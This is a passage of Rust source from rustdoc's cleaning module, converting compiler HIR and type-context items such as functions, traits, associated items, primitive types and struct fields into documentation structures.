ty::GenericParamDefKind::Type { .. } => None,
}).chain(simplify::ty_params(stripped_typarams).into_iter())
.collect(),
where_predicates: simplify::where_clauses(cx, where_predicates),
}
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Method {
pub generics: Generics,
pub decl: FnDecl,
pub header: hir::FnHeader,
}
impl<'a> Clean<Method> for (&'a hir::MethodSig, &'a hir::Generics, hir::BodyId) {
fn clean(&self, cx: &DocContext) -> Method {
let (generics, decl) = enter_impl_trait(cx, || {
(self.1.clean(cx), (&*self.0.decl, self.2).clean(cx))
});
Method {
decl,
generics,
header: self.0.header,
}
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct TyMethod {
pub header: hir::FnHeader,
pub decl: FnDecl,
pub generics: Generics,
}
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Function {
pub decl: FnDecl,
pub generics: Generics,
pub header: hir::FnHeader,
}
impl Clean<Item> for doctree::Function {
fn clean(&self, cx: &DocContext) -> Item {
let (generics, decl) = enter_impl_trait(cx, || {
(self.generics.clean(cx), (&self.decl, self.body).clean(cx))
});
Item {
name: Some(self.name.clean(cx)),
attrs: self.attrs.clean(cx),
source: self.whence.clean(cx),
visibility: self.vis.clean(cx),
stability: self.stab.clean(cx),
deprecation: self.depr.clean(cx),
def_id: cx.tcx.hir.local_def_id(self.id),
inner: FunctionItem(Function {
decl,
generics,
header: self.header,
}),
}
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub struct FnDecl {
pub inputs: Arguments,
pub output: FunctionRetTy,
pub variadic: bool,
pub attrs: Attributes,
}
impl FnDecl {
pub fn has_self(&self) -> bool {
self.inputs.values.len() > 0 && self.inputs.values[0].name == "self"
}
pub fn self_type(&self) -> Option<SelfTy> {
self.inputs.values.get(0).and_then(|v| v.to_self())
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub struct Arguments {
pub values: Vec<Argument>,
}
impl<'a> Clean<Arguments> for (&'a [hir::Ty], &'a [ast::Ident]) {
fn clean(&self, cx: &DocContext) -> Arguments {
Arguments {
values: self.0.iter().enumerate().map(|(i, ty)| {
let mut name = self.1.get(i).map(|ident| ident.to_string())
.unwrap_or(String::new());
if name.is_empty() {
name = "_".to_string();
}
Argument {
name,
type_: ty.clean(cx),
}
}).collect()
}
}
}
impl<'a> Clean<Arguments> for (&'a [hir::Ty], hir::BodyId) {
fn clean(&self, cx: &DocContext) -> Arguments {
let body = cx.tcx.hir.body(self.1);
Arguments {
values: self.0.iter().enumerate().map(|(i, ty)| {
Argument {
name: name_from_pat(&body.arguments[i].pat),
type_: ty.clean(cx),
}
}).collect()
}
}
}
impl<'a, A: Copy> Clean<FnDecl> for (&'a hir::FnDecl, A)
where (&'a [hir::Ty], A): Clean<Arguments>
{
fn clean(&self, cx: &DocContext) -> FnDecl {
FnDecl {
inputs: (&self.0.inputs[..], self.1).clean(cx),
output: self.0.output.clean(cx),
variadic: self.0.variadic,
attrs: Attributes::default()
}
}
}
impl<'a, 'tcx> Clean<FnDecl> for (DefId, ty::PolyFnSig<'tcx>) {
fn clean(&self, cx: &DocContext) -> FnDecl {
let (did, sig) = *self;
let mut names = if cx.tcx.hir.as_local_node_id(did).is_some() {
vec![].into_iter()
} else {
cx.tcx.fn_arg_names(did).into_iter()
};
FnDecl {
output: Return(sig.skip_binder().output().clean(cx)),
attrs: Attributes::default(),
variadic: sig.skip_binder().variadic,
inputs: Arguments {
values: sig.skip_binder().inputs().iter().map(|t| {
Argument {
type_: t.clean(cx),
name: names.next().map_or("".to_string(), |name| name.to_string()),
}
}).collect(),
},
}
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub struct Argument {
pub type_: Type,
pub name: String,
}
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Debug)]
pub enum SelfTy {
SelfValue,
SelfBorrowed(Option<Lifetime>, Mutability),
SelfExplicit(Type),
}
impl Argument {
pub fn to_self(&self) -> Option<SelfTy> {
if self.name != "self" {
return None;
}
if self.type_.is_self_type() {
return Some(SelfValue);
}
match self.type_ {
BorrowedRef{ref lifetime, mutability, ref type_} if type_.is_self_type() => {
Some(SelfBorrowed(lifetime.clone(), mutability))
}
_ => Some(SelfExplicit(self.type_.clone()))
}
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub enum FunctionRetTy {
Return(Type),
DefaultReturn,
}
impl Clean<FunctionRetTy> for hir::FunctionRetTy {
fn clean(&self, cx: &DocContext) -> FunctionRetTy {
match *self {
hir::Return(ref typ) => Return(typ.clean(cx)),
hir::DefaultReturn(..) => DefaultReturn,
}
}
}
impl GetDefId for FunctionRetTy {
fn def_id(&self) -> Option<DefId> {
match *self {
Return(ref ty) => ty.def_id(),
DefaultReturn => None,
}
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Trait {
pub auto: bool,
pub unsafety: hir::Unsafety,
pub items: Vec<Item>,
pub generics: Generics,
pub bounds: Vec<GenericBound>,
pub is_spotlight: bool,
pub is_auto: bool,
}
impl Clean<Item> for doctree::Trait {
fn clean(&self, cx: &DocContext) -> Item {
let attrs = self.attrs.clean(cx);
let is_spotlight = attrs.has_doc_flag("spotlight");
Item {
name: Some(self.name.clean(cx)),
attrs: attrs,
source: self.whence.clean(cx),
def_id: cx.tcx.hir.local_def_id(self.id),
visibility: self.vis.clean(cx),
stability: self.stab.clean(cx),
deprecation: self.depr.clean(cx),
inner: TraitItem(Trait {
auto: self.is_auto.clean(cx),
unsafety: self.unsafety,
items: self.items.clean(cx),
generics: self.generics.clean(cx),
bounds: self.bounds.clean(cx),
is_spotlight: is_spotlight,
is_auto: self.is_auto.clean(cx),
}),
}
}
}
impl Clean<bool> for hir::IsAuto {
fn clean(&self, _: &DocContext) -> bool {
match *self {
hir::IsAuto::Yes => true,
hir::IsAuto::No => false,
}
}
}
impl Clean<Type> for hir::TraitRef {
fn clean(&self, cx: &DocContext) -> Type {
resolve_type(cx, self.path.clean(cx), self.ref_id)
}
}
impl Clean<PolyTrait> for hir::PolyTraitRef {
fn clean(&self, cx: &DocContext) -> PolyTrait {
PolyTrait {
trait_: self.trait_ref.clean(cx),
generic_params: self.bound_generic_params.clean(cx)
}
}
}
impl Clean<Item> for hir::TraitItem {
fn clean(&self, cx: &DocContext) -> Item {
let inner = match self.node {
hir::TraitItemKind::Const(ref ty, default) => {
AssociatedConstItem(ty.clean(cx),
default.map(|e| print_const_expr(cx, e)))
}
hir::TraitItemKind::Method(ref sig, hir::TraitMethod::Provided(body)) => {
MethodItem((sig, &self.generics, body).clean(cx))
}
hir::TraitItemKind::Method(ref sig, hir::TraitMethod::Required(ref names)) => {
let (generics, decl) = enter_impl_trait(cx, || {
(self.generics.clean(cx), (&*sig.decl, &names[..]).clean(cx))
});
TyMethodItem(TyMethod {
header: sig.header,
decl,
generics,
})
}
hir::TraitItemKind::Type(ref bounds, ref default) => {
AssociatedTypeItem(bounds.clean(cx), default.clean(cx))
}
};
Item {
name: Some(self.ident.name.clean(cx)),
attrs: self.attrs.clean(cx),
source: self.span.clean(cx),
def_id: cx.tcx.hir.local_def_id(self.id),
visibility: None,
stability: get_stability(cx, cx.tcx.hir.local_def_id(self.id)),
deprecation: get_deprecation(cx, cx.tcx.hir.local_def_id(self.id)),
inner,
}
}
}
impl Clean<Item> for hir::ImplItem {
fn clean(&self, cx: &DocContext) -> Item {
let inner = match self.node {
hir::ImplItemKind::Const(ref ty, expr) => {
AssociatedConstItem(ty.clean(cx),
Some(print_const_expr(cx, expr)))
}
hir::ImplItemKind::Method(ref sig, body) => {
MethodItem((sig, &self.generics, body).clean(cx))
}
hir::ImplItemKind::Type(ref ty) => TypedefItem(Typedef {
type_: ty.clean(cx),
generics: Generics::default(),
}, true),
};
Item {
name: Some(self.ident.name.clean(cx)),
source: self.span.clean(cx),
attrs: self.attrs.clean(cx),
def_id: cx.tcx.hir.local_def_id(self.id),
visibility: self.vis.clean(cx),
stability: get_stability(cx, cx.tcx.hir.local_def_id(self.id)),
deprecation: get_deprecation(cx, cx.tcx.hir.local_def_id(self.id)),
inner,
}
}
}
impl<'tcx> Clean<Item> for ty::AssociatedItem {
fn clean(&self, cx: &DocContext) -> Item {
let inner = match self.kind {
ty::AssociatedKind::Const => {
let ty = cx.tcx.type_of(self.def_id);
let default = if self.defaultness.has_value() {
Some(inline::print_inlined_const(cx, self.def_id))
} else {
None
};
AssociatedConstItem(ty.clean(cx), default)
}
ty::AssociatedKind::Method => {
let generics = (cx.tcx.generics_of(self.def_id),
&cx.tcx.predicates_of(self.def_id)).clean(cx);
let sig = cx.tcx.fn_sig(self.def_id);
let mut decl = (self.def_id, sig).clean(cx);
if self.method_has_self_argument {
let self_ty = match self.container {
ty::ImplContainer(def_id) => {
cx.tcx.type_of(def_id)
}
ty::TraitContainer(_) => cx.tcx.mk_self_type()
};
let self_arg_ty = *sig.input(0).skip_binder();
if self_arg_ty == self_ty {
decl.inputs.values[0].type_ = Generic(String::from("Self"));
} else if let ty::TyRef(_, ty, _) = self_arg_ty.sty {
if ty == self_ty {
match decl.inputs.values[0].type_ {
BorrowedRef{ref mut type_, ..} => {
**type_ = Generic(String::from("Self"))
}
_ => unreachable!(),
}
}
}
}
let provided = match self.container {
ty::ImplContainer(_) => true,
ty::TraitContainer(_) => self.defaultness.has_value()
};
if provided {
let constness = if cx.tcx.is_const_fn(self.def_id) {
hir::Constness::Const
} else {
hir::Constness::NotConst
};
MethodItem(Method {
generics,
decl,
header: hir::FnHeader {
unsafety: sig.unsafety(),
abi: sig.abi(),
constness,
asyncness: hir::IsAsync::NotAsync,
}
})
} else {
TyMethodItem(TyMethod {
generics,
decl,
header: hir::FnHeader {
unsafety: sig.unsafety(),
abi: sig.abi(),
constness: hir::Constness::NotConst,
asyncness: hir::IsAsync::NotAsync,
}
})
}
}
ty::AssociatedKind::Type => {
let my_name = self.ident.name.clean(cx);
if let ty::TraitContainer(did) = self.container {
// When loading a cross-crate associated type, the bounds for this type
// are actually located on the trait/impl itself, so we need to load
// all of the generics from there and then look for bounds that are
// applied to this associated type in question.
let predicates = cx.tcx.predicates_of(did);
let generics = (cx.tcx.generics_of(did), &predicates).clean(cx);
let mut bounds = generics.where_predicates.iter().filter_map(|pred| {
let (name, self_type, trait_, bounds) = match *pred {
WherePredicate::BoundPredicate {
ty: QPath { ref name, ref self_type, ref trait_ },
ref bounds
} => (name, self_type, trait_, bounds),
_ => return None,
};
if *name != my_name { return None }
match **trait_ {
ResolvedPath { did, .. } if did == self.container.id() => {}
_ => return None,
}
match **self_type {
Generic(ref s) if *s == "Self" => {}
_ => return None,
}
Some(bounds)
}).flat_map(|i| i.iter().cloned()).collect::<Vec<_>>();
// Our Sized/?Sized bound didn't get handled when creating the generics
// because we didn't actually get our whole set of bounds until just now
// (some of them may have come from the trait). If we do have a sized
// bound, we remove it, and if we don't then we add the `?Sized` bound
// at the end.
match bounds.iter().position(|b| b.is_sized_bound(cx)) {
Some(i) => { bounds.remove(i); }
None => bounds.push(GenericBound::maybe_sized(cx)),
}
let ty = if self.defaultness.has_value() {
Some(cx.tcx.type_of(self.def_id))
} else {
None
};
AssociatedTypeItem(bounds, ty.clean(cx))
} else {
TypedefItem(Typedef {
type_: cx.tcx.type_of(self.def_id).clean(cx),
generics: Generics {
params: Vec::new(),
where_predicates: Vec::new(),
},
}, true)
}
}
};
let visibility = match self.container {
ty::ImplContainer(_) => self.vis.clean(cx),
ty::TraitContainer(_) => None,
};
Item {
name: Some(self.ident.name.clean(cx)),
visibility,
stability: get_stability(cx, self.def_id),
deprecation: get_deprecation(cx, self.def_id),
def_id: self.def_id,
attrs: inline::load_attrs(cx, self.def_id),
source: cx.tcx.def_span(self.def_id).clean(cx),
inner,
}
}
}
/// A trait reference, which may have higher ranked lifetimes.
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub struct PolyTrait {
pub trait_: Type,
pub generic_params: Vec<GenericParamDef>,
}
/// A representation of a Type suitable for hyperlinking purposes. Ideally one can get the original
/// type out of the AST/TyCtxt given one of these, if more information is needed. Most importantly
/// it does not preserve mutability or boxes.
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub enum Type {
/// structs/enums/traits (most that'd be an hir::TyPath)
ResolvedPath {
path: Path,
typarams: Option<Vec<GenericBound>>,
did: DefId,
/// true if is a `T::Name` path for associated types
is_generic: bool,
},
/// For parameterized types, so the consumer of the JSON don't go
/// looking for types which don't exist anywhere.
Generic(String),
/// Primitives are the fixed-size numeric types (plus int/usize/float), char,
/// arrays, slices, and tuples.
Primitive(PrimitiveType),
/// extern "ABI" fn
BareFunction(Box<BareFunctionDecl>),
Tuple(Vec<Type>),
Slice(Box<Type>),
Array(Box<Type>, String),
Never,
Unique(Box<Type>),
RawPointer(Mutability, Box<Type>),
BorrowedRef {
lifetime: Option<Lifetime>,
mutability: Mutability,
type_: Box<Type>,
},
// <Type as Trait>::Name
QPath {
name: String,
self_type: Box<Type>,
trait_: Box<Type>
},
// _
Infer,
// impl TraitA+TraitB
ImplTrait(Vec<GenericBound>),
}
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Hash, Copy, Debug)]
pub enum PrimitiveType {
Isize, I8, I16, I32, I64, I128,
Usize, U8, U16, U32, U64, U128,
F32, F64,
Char,
Bool,
Str,
Slice,
Array,
Tuple,
Unit,
RawPointer,
Reference,
Fn,
Never,
}
#[derive(Clone, RustcEncodable, RustcDecodable, Copy, Debug)]
pub enum TypeKind {
Enum,
Function,
Module,
Const,
Static,
Struct,
Union,
Trait,
Variant,
Typedef,
Foreign,
Macro,
}
pub trait GetDefId {
fn def_id(&self) -> Option<DefId>;
}
impl<T: GetDefId> GetDefId for Option<T> {
fn def_id(&self) -> Option<DefId> {
self.as_ref().and_then(|d| d.def_id())
}
}
impl Type {
pub fn primitive_type(&self) -> Option<PrimitiveType> {
match *self {
Primitive(p) | BorrowedRef { type_: box Primitive(p), ..} => Some(p),
Slice(..) | BorrowedRef { type_: box Slice(..), .. } => Some(PrimitiveType::Slice),
Array(..) | BorrowedRef { type_: box Array(..), .. } => Some(PrimitiveType::Array),
Tuple(ref tys) => if tys.is_empty() {
Some(PrimitiveType::Unit)
} else {
Some(PrimitiveType::Tuple)
},
RawPointer(..) => Some(PrimitiveType::RawPointer),
BorrowedRef { type_: box Generic(..), .. } => Some(PrimitiveType::Reference),
BareFunction(..) => Some(PrimitiveType::Fn),
Never => Some(PrimitiveType::Never),
_ => None,
}
}
pub fn is_generic(&self) -> bool {
match *self {
ResolvedPath { is_generic, .. } => is_generic,
_ => false,
}
}
pub fn is_self_type(&self) -> bool {
match *self {
Generic(ref name) => name == "Self",
_ => false
}
}
pub fn generics(&self) -> Option<&[Type]> {
match *self {
ResolvedPath { ref path, .. } => {
path.segments.last().and_then(|seg| {
if let GenericArgs::AngleBracketed { ref types, .. } = seg.args {
Some(&**types)
} else {
None
}
})
}
_ => None,
}
}
}
impl GetDefId for Type {
fn def_id(&self) -> Option<DefId> {
match *self {
ResolvedPath { did, .. } => Some(did),
Primitive(p) => ::html::render::cache().primitive_locations.get(&p).cloned(),
BorrowedRef { type_: box Generic(..), .. } =>
Primitive(PrimitiveType::Reference).def_id(),
BorrowedRef { ref type_, .. } => type_.def_id(),
Tuple(ref tys) => if tys.is_empty() {
Primitive(PrimitiveType::Unit).def_id()
} else {
Primitive(PrimitiveType::Tuple).def_id()
},
BareFunction(..) => Primitive(PrimitiveType::Fn).def_id(),
Never => Primitive(PrimitiveType::Never).def_id(),
Slice(..) => Primitive(PrimitiveType::Slice).def_id(),
Array(..) => Primitive(PrimitiveType::Array).def_id(),
RawPointer(..) => Primitive(PrimitiveType::RawPointer).def_id(),
QPath { ref self_type, .. } => self_type.def_id(),
_ => None,
}
}
}
impl PrimitiveType {
fn from_str(s: &str) -> Option<PrimitiveType> {
match s {
"isize" => Some(PrimitiveType::Isize),
"i8" => Some(PrimitiveType::I8),
"i16" => Some(PrimitiveType::I16),
"i32" => Some(PrimitiveType::I32),
"i64" => Some(PrimitiveType::I64),
"i128" => Some(PrimitiveType::I128),
"usize" => Some(PrimitiveType::Usize),
"u8" => Some(PrimitiveType::U8),
"u16" => Some(PrimitiveType::U16),
"u32" => Some(PrimitiveType::U32),
"u64" => Some(PrimitiveType::U64),
"u128" => Some(PrimitiveType::U128),
"bool" => Some(PrimitiveType::Bool),
"char" => Some(PrimitiveType::Char),
"str" => Some(PrimitiveType::Str),
"f32" => Some(PrimitiveType::F32),
"f64" => Some(PrimitiveType::F64),
"array" => Some(PrimitiveType::Array),
"slice" => Some(PrimitiveType::Slice),
"tuple" => Some(PrimitiveType::Tuple),
"unit" => Some(PrimitiveType::Unit),
"pointer" => Some(PrimitiveType::RawPointer),
"reference" => Some(PrimitiveType::Reference),
"fn" => Some(PrimitiveType::Fn),
"never" => Some(PrimitiveType::Never),
_ => None,
}
}
pub fn as_str(&self) -> &'static str {
use self::PrimitiveType::*;
match *self {
Isize => "isize",
I8 => "i8",
I16 => "i16",
I32 => "i32",
I64 => "i64",
I128 => "i128",
Usize => "usize",
U8 => "u8",
U16 => "u16",
U32 => "u32",
U64 => "u64",
U128 => "u128",
F32 => "f32",
F64 => "f64",
Str => "str",
Bool => "bool",
Char => "char",
Array => "array",
Slice => "slice",
Tuple => "tuple",
Unit => "unit",
RawPointer => "pointer",
Reference => "reference",
Fn => "fn",
Never => "never",
}
}
pub fn to_url_str(&self) -> &'static str {
self.as_str()
}
}
impl From<ast::IntTy> for PrimitiveType {
fn from(int_ty: ast::IntTy) -> PrimitiveType {
match int_ty {
ast::IntTy::Isize => PrimitiveType::Isize,
ast::IntTy::I8 => PrimitiveType::I8,
ast::IntTy::I16 => PrimitiveType::I16,
ast::IntTy::I32 => PrimitiveType::I32,
ast::IntTy::I64 => PrimitiveType::I64,
ast::IntTy::I128 => PrimitiveType::I128,
}
}
}
impl From<ast::UintTy> for PrimitiveType {
fn from(uint_ty: ast::UintTy) -> PrimitiveType {
match uint_ty {
ast::UintTy::Usize => PrimitiveType::Usize,
ast::UintTy::U8 => PrimitiveType::U8,
ast::UintTy::U16 => PrimitiveType::U16,
ast::UintTy::U32 => PrimitiveType::U32,
ast::UintTy::U64 => PrimitiveType::U64,
ast::UintTy::U128 => PrimitiveType::U128,
}
}
}
impl From<ast::FloatTy> for PrimitiveType {
fn from(float_ty: ast::FloatTy) -> PrimitiveType {
match float_ty {
ast::FloatTy::F32 => PrimitiveType::F32,
ast::FloatTy::F64 => PrimitiveType::F64,
}
}
}
impl Clean<Type> for hir::Ty {
fn clean(&self, cx: &DocContext) -> Type {
use rustc::hir::*;
match self.node {
TyNever => Never,
TyPtr(ref m) => RawPointer(m.mutbl.clean(cx), box m.ty.clean(cx)),
TyRptr(ref l, ref m) => {
let lifetime = if l.is_elided() {
None
} else {
Some(l.clean(cx))
};
BorrowedRef {lifetime: lifetime, mutability: m.mutbl.clean(cx),
type_: box m.ty.clean(cx)}
}
TySlice(ref ty) => Slice(box ty.clean(cx)),
TyArray(ref ty, ref length) => {
let def_id = cx.tcx.hir.local_def_id(length.id);
let param_env = cx.tcx.param_env(def_id);
let substs = Substs::identity_for_item(cx.tcx, def_id);
let cid = GlobalId {
instance: ty::Instance::new(def_id, substs),
promoted: None
};
let length = cx.tcx.const_eval(param_env.and(cid)).unwrap_or_else(|_| {
ty::Const::unevaluated(cx.tcx, def_id, substs, cx.tcx.types.usize)
});
let length = print_const(cx, length);
Array(box ty.clean(cx), length)
},
TyTup(ref tys) => Tuple(tys.clean(cx)),
TyPath(hir::QPath::Resolved(None, ref path)) => {
if let Some(new_ty) = cx.ty_substs.borrow().get(&path.def).cloned() {
return new_ty;
}
if let Def::TyParam(did) = path.def {
if let Some(bounds) = cx.impl_trait_bounds.borrow_mut().remove(&did) {
return ImplTrait(bounds);
}
}
let mut alias = None;
if let Def::TyAlias(def_id) = path.def {
// Substitute private type aliases
if let Some(node_id) = cx.tcx.hir.as_local_node_id(def_id) {
if !cx.access_levels.borrow().is_exported(def_id) {
alias = Some(&cx.tcx.hir.expect_item(node_id).node);
}
}
};
if let Some(&hir::ItemTy(ref ty, ref generics)) = alias {
let provided_params = &path.segments.last().unwrap();
let mut ty_substs = FxHashMap();
let mut lt_substs = FxHashMap();
provided_params.with_generic_args(|generic_args| {
let mut indices = ty::GenericParamCount {
lifetimes: 0,
types: 0
};
for param in generics.params.iter() {
match param.kind {
hir::GenericParamKind::Lifetime { .. } => {
let mut j = 0;
let lifetime = generic_args.args.iter().find_map(|arg| {
match arg {
GenericArg::Lifetime(lt) => {
if indices.lifetimes == j {
return Some(lt);
}
j += 1;
None
}
_ => None,
}
});
if let Some(lt) = lifetime.cloned() {
if !lt.is_elided() {
let lt_def_id =
cx.tcx.hir.local_def_id(param.id);
lt_substs.insert(lt_def_id, lt.clean(cx));
}
}
indices.lifetimes += 1;
}
hir::GenericParamKind::Type { ref default, .. } => {
let ty_param_def =
Def::TyParam(cx.tcx.hir.local_def_id(param.id));
let mut j = 0;
let type_ = generic_args.args.iter().find_map(|arg| {
match arg {
GenericArg::Type(ty) => {
if indices.types == j {
return Some(ty);
}
j += 1;
None
}
_ => None,
}
});
if let Some(ty) = type_.cloned() {
ty_substs.insert(ty_param_def, ty.clean(cx));
} else if let Some(default) = default.clone() {
ty_substs.insert(ty_param_def,
default.into_inner().clean(cx));
}
indices.types += 1;
}
}
}
});
return cx.enter_alias(ty_substs, lt_substs, || ty.clean(cx));
}
resolve_type(cx, path.clean(cx), self.id)
}
TyPath(hir::QPath::Resolved(Some(ref qself), ref p)) => {
let mut segments: Vec<_> = p.segments.clone().into();
segments.pop();
let trait_path = hir::Path {
span: p.span,
def: Def::Trait(cx.tcx.associated_item(p.def.def_id()).container.id()),
segments: segments.into(),
};
Type::QPath {
name: p.segments.last().unwrap().ident.name.clean(cx),
self_type: box qself.clean(cx),
trait_: box resolve_type(cx, trait_path.clean(cx), self.id)
}
}
TyPath(hir::QPath::TypeRelative(ref qself, ref segment)) => {
let mut def = Def::Err;
let ty = hir_ty_to_ty(cx.tcx, self);
if let ty::TyProjection(proj) = ty.sty {
def = Def::Trait(proj.trait_ref(cx.tcx).def_id);
}
let trait_path = hir::Path {
span: self.span,
def,
segments: vec![].into(),
};
Type::QPath {
name: segment.ident.name.clean(cx),
self_type: box qself.clean(cx),
trait_: box resolve_type(cx, trait_path.clean(cx), self.id)
}
}
TyTraitObject(ref bounds, ref lifetime) => {
match bounds[0].clean(cx).trait_ {
ResolvedPath { path, typarams: None, did, is_generic } => {
let mut bounds: Vec<self::GenericBound> = bounds[1..].iter().map(|bound| {
self::GenericBound::TraitBound(bound.clean(cx),
hir::TraitBoundModifier::None)
}).collect();
if !lifetime.is_elided() {
bounds.push(self::GenericBound::Outlives(lifetime.clean(cx)));
}
ResolvedPath { path, typarams: Some(bounds), did, is_generic, }
}
_ => Infer // shouldn't happen
}
}
TyBareFn(ref barefn) => BareFunction(box barefn.clean(cx)),
TyInfer | TyErr => Infer,
TyTypeof(..) => panic!("Unimplemented type {:?}", self.node),
}
}
}
impl<'tcx> Clean<Type> for Ty<'tcx> {
fn clean(&self, cx: &DocContext) -> Type {
match self.sty {
ty::TyNever => Never,
ty::TyBool => Primitive(PrimitiveType::Bool),
ty::TyChar => Primitive(PrimitiveType::Char),
ty::TyInt(int_ty) => Primitive(int_ty.into()),
ty::TyUint(uint_ty) => Primitive(uint_ty.into()),
ty::TyFloat(float_ty) => Primitive(float_ty.into()),
ty::TyStr => Primitive(PrimitiveType::Str),
ty::TySlice(ty) => Slice(box ty.clean(cx)),
ty::TyArray(ty, n) => {
let mut n = cx.tcx.lift(&n).unwrap();
if let ConstValue::Unevaluated(def_id, substs) = n.val {
let param_env = cx.tcx.param_env(def_id);
let cid = GlobalId {
instance: ty::Instance::new(def_id, substs),
promoted: None
};
if let Ok(new_n) = cx.tcx.const_eval(param_env.and(cid)) {
n = new_n;
}
};
let n = print_const(cx, n);
Array(box ty.clean(cx), n)
}
ty::TyRawPtr(mt) => RawPointer(mt.mutbl.clean(cx), box mt.ty.clean(cx)),
ty::TyRef(r, ty, mutbl) => BorrowedRef {
lifetime: r.clean(cx),
mutability: mutbl.clean(cx),
type_: box ty.clean(cx),
},
ty::TyFnDef(..) |
ty::TyFnPtr(_) => {
let ty = cx.tcx.lift(self).unwrap();
let sig = ty.fn_sig(cx.tcx);
BareFunction(box BareFunctionDecl {
unsafety: sig.unsafety(),
generic_params: Vec::new(),
decl: (cx.tcx.hir.local_def_id(ast::CRATE_NODE_ID), sig).clean(cx),
abi: sig.abi(),
})
}
ty::TyAdt(def, substs) => {
let did = def.did;
let kind = match def.adt_kind() {
AdtKind::Struct => TypeKind::Struct,
AdtKind::Union => TypeKind::Union,
AdtKind::Enum => TypeKind::Enum,
};
inline::record_extern_fqn(cx, did, kind);
let path = external_path(cx, &cx.tcx.item_name(did).as_str(),
None, false, vec![], substs);
ResolvedPath {
path,
typarams: None,
did,
is_generic: false,
}
}
ty::TyForeign(did) => {
inline::record_extern_fqn(cx, did, TypeKind::Foreign);
let path = external_path(cx, &cx.tcx.item_name(did).as_str(),
None, false, vec![], Substs::empty());
ResolvedPath {
path: path,
typarams: None,
did: did,
is_generic: false,
}
}
ty::TyDynamic(ref obj, ref reg) => {
if let Some(principal) = obj.principal() {
let did = principal.def_id();
inline::record_extern_fqn(cx, did, TypeKind::Trait);
let mut typarams = vec![];
reg.clean(cx).map(|b| typarams.push(GenericBound::Outlives(b)));
for did in obj.auto_traits() {
let empty = cx.tcx.intern_substs(&[]);
let path = external_path(cx, &cx.tcx.item_name(did).as_str(),
Some(did), false, vec![], empty);
inline::record_extern_fqn(cx, did, TypeKind::Trait);
let bound = GenericBound::TraitBound(PolyTrait {
trait_: ResolvedPath {
path,
typarams: None,
did,
is_generic: false,
},
generic_params: Vec::new(),
}, hir::TraitBoundModifier::None);
typarams.push(bound);
}
let mut bindings = vec![];
for pb in obj.projection_bounds() {
bindings.push(TypeBinding {
name: cx.tcx.associated_item(pb.item_def_id()).ident.name.clean(cx),
ty: pb.skip_binder().ty.clean(cx)
});
}
let path = external_path(cx, &cx.tcx.item_name(did).as_str(), Some(did),
false, bindings, principal.skip_binder().substs);
ResolvedPath {
path,
typarams: Some(typarams),
did,
is_generic: false,
}
} else {
Never
}
}
ty::TyTuple(ref t) => Tuple(t.clean(cx)),
ty::TyProjection(ref data) => data.clean(cx),
ty::TyParam(ref p) => Generic(p.name.to_string()),
ty::TyAnon(def_id, substs) => {
// Grab the "TraitA + TraitB" from `impl TraitA + TraitB`,
// by looking up the projections associated with the def_id.
let predicates_of = cx.tcx.predicates_of(def_id);
let substs = cx.tcx.lift(&substs).unwrap();
let bounds = predicates_of.instantiate(cx.tcx, substs);
let mut regions = vec![];
let mut has_sized = false;
let mut bounds = bounds.predicates.iter().filter_map(|predicate| {
let trait_ref = if let Some(tr) = predicate.to_opt_poly_trait_ref() {
tr
} else if let ty::Predicate::TypeOutlives(pred) = *predicate {
// these should turn up at the end
pred.skip_binder().1.clean(cx).map(|r| {
regions.push(GenericBound::Outlives(r))
});
return None;
} else {
return None;
};
if let Some(sized) = cx.tcx.lang_items().sized_trait() {
if trait_ref.def_id() == sized {
has_sized = true;
return None;
}
}
let bounds = bounds.predicates.iter().filter_map(|pred|
if let ty::Predicate::Projection(proj) = *pred {
let proj = proj.skip_binder();
if proj.projection_ty.trait_ref(cx.tcx) == *trait_ref.skip_binder() {
Some(TypeBinding {
name: cx.tcx.associated_item(proj.projection_ty.item_def_id)
.ident.name.clean(cx),
ty: proj.ty.clean(cx),
})
} else {
None
}
} else {
None
}
).collect();
Some((trait_ref.skip_binder(), bounds).clean(cx))
}).collect::<Vec<_>>();
bounds.extend(regions);
if !has_sized && !bounds.is_empty() {
bounds.insert(0, GenericBound::maybe_sized(cx));
}
ImplTrait(bounds)
}
ty::TyClosure(..) | ty::TyGenerator(..) => Tuple(vec![]), // FIXME(pcwalton)
ty::TyGeneratorWitness(..) => panic!("TyGeneratorWitness"),
ty::TyInfer(..) => panic!("TyInfer"),
ty::TyError => panic!("TyError"),
}
}
}
impl Clean<Item> for hir::StructField {
fn clean(&self, cx: &DocContext) -> Item {
Item {
name: Some(self.ident.name).clean(cx),
attrs: self.attrs.clean(cx),
source: self.span.clean(cx),
visibility: self.vis.clean(cx),
stability: get_stability(cx, cx.tcx.hir.local_def_id(self.id)),
deprecation: get_deprecation(cx, cx.tcx.hir.local_def_id(self.id)),
def_id: cx.tcx.hir.local_def_id(self.id),
inner: StructFieldItem(self.ty.clean(cx)),
}
}
}
impl<'tcx> Clean<Item> for ty::FieldDef {
fn clean(&self, cx: &DocContext) -> Item {
Item {
name: Some(self.ident.name).clean(cx),
attrs: cx.tcx.get_attrs(self.did).clean(cx),
source: cx.tcx.def_span(self.did).clean(cx),
visibility: self.vis.clean(cx),
stability: get_stability(cx, self.did),
deprecation: get_deprecation(cx, self.did),
def_id: self.did,
inner: StructFieldItem(cx.tcx.type_of(self.did).clean(cx)),
}
}
}
#[derive(Clone, PartialEq, Eq, RustcDecodable, RustcEncodable, Debug)]
pub enum Visibility {
Public,
Inherited,
Crate,
Restricted(DefId, Path),
}
impl Clean<Option<Visibility>> for hir::Visibility {
fn clean(&self, cx: &DocContext) -> Option<Visibility> {
Some(match self.node {
hir::VisibilityKind::Public => Visibility::Public,
hir::VisibilityKind::Inherited => Visibility::Inherited,
